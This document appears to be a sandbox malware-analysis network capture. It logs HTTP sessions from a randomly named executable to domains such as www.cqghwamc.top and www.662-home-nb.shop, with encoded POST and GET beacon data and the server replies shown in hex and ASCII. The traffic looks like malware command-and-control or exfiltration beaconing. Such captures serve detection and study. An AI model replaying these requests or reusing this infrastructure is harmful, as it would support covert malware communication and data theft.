                                                                                                                            18192.168.2.450025221.128.225.57803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:16.537206888 CEST883OUTPOST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 48 49 76 62 50 36 45 6c 50 47 30 37 67 4a 54 71 62 30 39 68 64 2f 4a 4d 50 37 4d 72 61 44 34 79 67 44 74 51 68 30 57 52 69 69 4b 65 31 4d 45 33 57 31 65 53 69 47 65 65 55 62 6b 46 37 4d 71 34 41 4d 61 4d 72 54 79 53 6d 69 50 73 4f 48 68 4a 4e 36 5a 34 62 2b 45 33 4d 6f 64 68 4d 66 51 71 37 79 53 7a 6f 4e 32 37 31 39 52 74 34 69 4e 37 6b 78 53 75 6a 68 45 6e 4a 6d 50 38 64 66 38 4e 48 62 63 2b 4b 68 6b 4a 55 70 43 52 79 46 31 49 39 50 78 42 31 2b 67 49 58 48 66 6b 42 7a 74 31 6e 36 48 43 48 39 30 58 34 4f 58 65 6e 76 61 37 44 56 34 7a 37 6d 69 74 44 77 62 6e 57 56 30 2f 46 55 57 56 31 38 62 69 7a 57 73 2f 65 4b 31 43 42 2b 72 61 6e 55 3d
                                                                                                                            Data Ascii: 2BWDG=NHIvbP6ElPG07gJTqb09hd/JMP7MraD4ygDtQh0WRiiKe1ME3W1eSiGeeUbkF7Mq4AMaMrTySmiPsOHhJN6Z4b+E3ModhMfQq7ySzoN2719Rt4iN7kxSujhEnJmP8df8NHbc+KhkJUpCRyF1I9PxB1+gIXHfkBzt1n6HCH90X4OXenva7DV4z7mitDwbnWV0/FUWV18bizWs/eK1CB+ranU=
                                                                                                                            Oct 19, 2024 12:58:17.484088898 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a673d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:16 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                                                            Oct 19, 2024 12:58:17.484107971 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>
                                                                                                                            Oct 19, 2024 12:58:17.507009983 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.450026221.128.225.57803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:19.082093000 CEST10965OUTPOST /90ie/ HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.cqghwamc.top
                                                                                                                            Referer: http://www.cqghwamc.top/90ie/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 48 49 76 62 50 36 45 6c 50 47 30 37 67 4a 54 71 62 30 39 68 64 2f 4a 4d 50 37 4d 72 61 44 34 79 67 44 74 51 68 30 57 52 6a 32 4b 66 48 45 45 6c 6c 4e 65 44 53 47 65 54 30 62 6c 46 37 4d 33 34 41 6b 65 4d 72 66 49 53 67 75 50 75 74 2f 68 42 59 4f 5a 72 37 2b 45 31 4d 6f 51 75 73 65 53 71 37 69 57 7a 6f 64 32 37 31 39 52 74 35 53 4e 79 52 52 53 6f 6a 68 44 33 70 6d 4c 32 39 66 55 4e 48 69 6e 2b 4b 73 52 4a 46 4a 43 57 53 56 31 62 76 6e 78 65 6c 2b 69 50 58 48 48 6b 42 2f 79 31 6e 58 32 43 48 6c 4e 58 2f 2b 58 62 44 76 4e 68 42 56 6f 6e 6f 61 6f 77 41 4d 41 6d 47 56 48 35 33 78 6a 64 6e 51 47 39 53 6d 6c 38 38 4c 64 53 78 57 4b 42 57 54 6f 74 36 59 2f 4f 43 46 42 30 46 73 7a 2f 36 5a 72 72 73 59 74 6f 76 73 35 36 38 6b 41 6d 45 51 62 58 58 44 4e 67 56 73 72 6b 32 6d 76 5a 57 43 32 4b 2f 61 30 57 6b 4a 41 2b 58 71 68 38 2f 4f 4c 46 71 4b 6f 58 72 2f 33 42 46 6a 5a 78 79 55 64 47 47 45 52 6d 6a 53 67 49 69 6d 4f 74 33 74 2f 30 6f 4b 36 53 47 2f 2b 4b 68 4d 53 30 55 4e 7a 4a 34 74 30 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=NHIvbP6ElPG07gJTqb09hd/JMP7MraD4ygDtQh0WRj2KfHEEllNeDSGeT0blF7M34AkeMrfISguPut/hBYOZr7+E1MoQuseSq7iWzod2719Rt5SNyRRSojhD3pmL29fUNHin+KsRJFJCWSV1bvnxel+iPXHHkB/y1nX2CHlNX/+XbDvNhBVonoaowAMAmGVH53xjdnQG9Sml88LdSxWKBWTot6Y/OCFB0Fsz/6ZrrsYtovs568kAmEQbXXDNgVsrk2mvZWC2K/a0WkJA+Xqh8/OLFqKoXr/3BFjZxyUdGGERmjSgIimOt3t/0oK6SG/+KhMS0UNzJ4t0GTAxCxcL2aaEtbsRaOI1U9RBOYG9g0zi+dzCT8cP5war8k91C+ziTeiwsnBli9HENLKNPr07B7Dz2vENHdNMEauila5u7bHH8itz+OigbRYL2A5BIhuMdf/qe8tn2sb+DTPQS22LPNRpg2Vm5oJVW9YwJkhfgWkvDTaMI2WXUf9KLsTIIz1HBwJTb/blRFJcX4SywCSEY3yAt/r+vWMJe/Dr1zIieVY0VlIvRR6pk+yWtoQMuP/i+HXFgK1hqESNpGdi2ejWoOBfPC6QvRMmE0IHfvqbOcf940D6kb/4fIJ82zic1W5POer3w2si5B6Ldz3P++26ics6m5VGGZUE4N878ML705LUfcmSKYZh8vC/spSE0A0cT1P+jrpXAjjR2VM5T2oJo5TEKQz6emwTZD4HauMCTTeXyjFUnPjAObfRpHzqfae14wPdcJzJa09MrejM5Js9CyIuzK8D9CjoHzg7vI0Ogq2wCjGvuIvUPr/PwO6hr6ZcrKf3GEcFtQr0jMgv75GoY5k8n0FRnmIaz8xXl2EUuB2ikSdNwuMYWcBEVDLEJHIUg5mNk2JWnq6PN3aB/rsnlIQj7EZUAmCBT0EqE6vXkervX+Pj8sAs+Dy4XMvcmHMOwZdzyRpZx1bWrzUivinBnHdnUb4s4gT8HB1M3zbbQvRHGa [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:58:20.029829025 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a675d5211e16a0470c6885ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:18 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                                                            Oct 19, 2024 12:58:20.030311108 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.450027221.128.225.57803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:21.626403093 CEST595OUTGET /90ie/?2BWDG=AFgPY5yU7pWSzToyhb8ap/LyT/DZ/ZjK5Re3S38zcWWIWncLwX1SLyCTcQH6faMmzCRwYrf9WSeYlPfjK7mc/MKG5u8f2O6ThoCO5oN+7y0XqZ+4yAUZ7Sk=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.cqghwamc.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:58:22.594252110 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Set-Cookie: _d_id=a674d5211e16a089760985ef782ea8; Path=/; HttpOnly; SameSite=Lax
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:21 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 1163
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-containe
                                                                                                                            Oct 19, 2024 12:58:22.594269991 CEST165INData Raw: 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be
                                                                                                                            Data Ascii: r"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.450028199.59.243.227803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:58:27.886468887 CEST875OUTPOST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4c 58 69 79 43 65 38 52 61 31 61 34 34 4d 71 6c 48 51 4b 2b 32 73 6d 69 53 51 66 4b 5a 48 38 57 33 7a 55 68 34 31 37 6e 6b 51 54 38 71 64 78 75 4c 2b 4b 57 4d 6c 4c 59 6c 39 57 4b 6f 2b 61 54 51 4c 66 76 2f 49 43 63 33 48 49 4a 5a 33 32 64 56 43 31 49 2b 65 46 4d 4f 50 6f 4c 66 2b 4a 71 64 43 36 6f 7a 6d 4d 68 4d 38 2f 6e 70 72 78 62 47 39 78 64 65 42 6d 6f 4a 38 34 72 30 51 48 47 51 6a 37 61 58 69 36 70 69 73 6f 64 56 4e 77 6a 4d 4e 4b 42 45 66 45 4f 46 65 54 31 71 68 67 37 54 38 2f 5a 48 63 6d 67 67 50 39 6e 55 4e 45 52 74 37 44 42 6c 6a 53 50 6b 72 50 38 44 50 32 34 46 51 3d 3d
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a44MqlHQK+2smiSQfKZH8W3zUh417nkQT8qdxuL+KWMlLYl9WKo+aTQLfv/ICc3HIJZ32dVC1I+eFMOPoLf+JqdC6ozmMhM8/nprxbG9xdeBmoJ84r0QHGQj7aXi6pisodVNwjMNKBEfEOFeT1qhg7T8/ZHcmggP9nUNERt7DBljSPkrP8DP24FQ==
                                                                                                                            Oct 19, 2024 12:58:29.004385948 CEST1236INHTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:27 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 2041ebe1-f746-42f8-91b8-df80bd377703
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=2041ebe1-f746-42f8-91b8-df80bd377703; expires=Sat, 19 Oct 2024 11:13:28 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 76 78 32 4e 2f 32 79 43 4f 51 76 56 33 4d 52 78 48 65 38 50 77 31 52 34 61 50 53 35 30 47 57 53 4f 52 6b 6d 59 4c 5a 6b 4c 6f 46 56 7a 45 74 5a 79 50 36 4c 5a 75 58 62 31 71 64 56 6d 5a 4b 64 37 62 49 38 76 51 36 73 73 79 74 54 54 6c 67 4e 2b 63 41 53 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                            Oct 19, 2024 12:58:29.004410028 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjA0MWViZTEtZjc0Ni00MmY4LTkxYjgtZGY4MGJkMzc3NzAzIiwicGFnZV90aW1lIjoxNzI5MzM1NT
                                                                                                                            Oct 19, 2024 12:58:29.004755020 CEST1236INHTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:27 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: 2041ebe1-f746-42f8-91b8-df80bd377703
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=2041ebe1-f746-42f8-91b8-df80bd377703; expires=Sat, 19 Oct 2024 11:13:28 GMT; path=/
                                                                                                                            connection: close
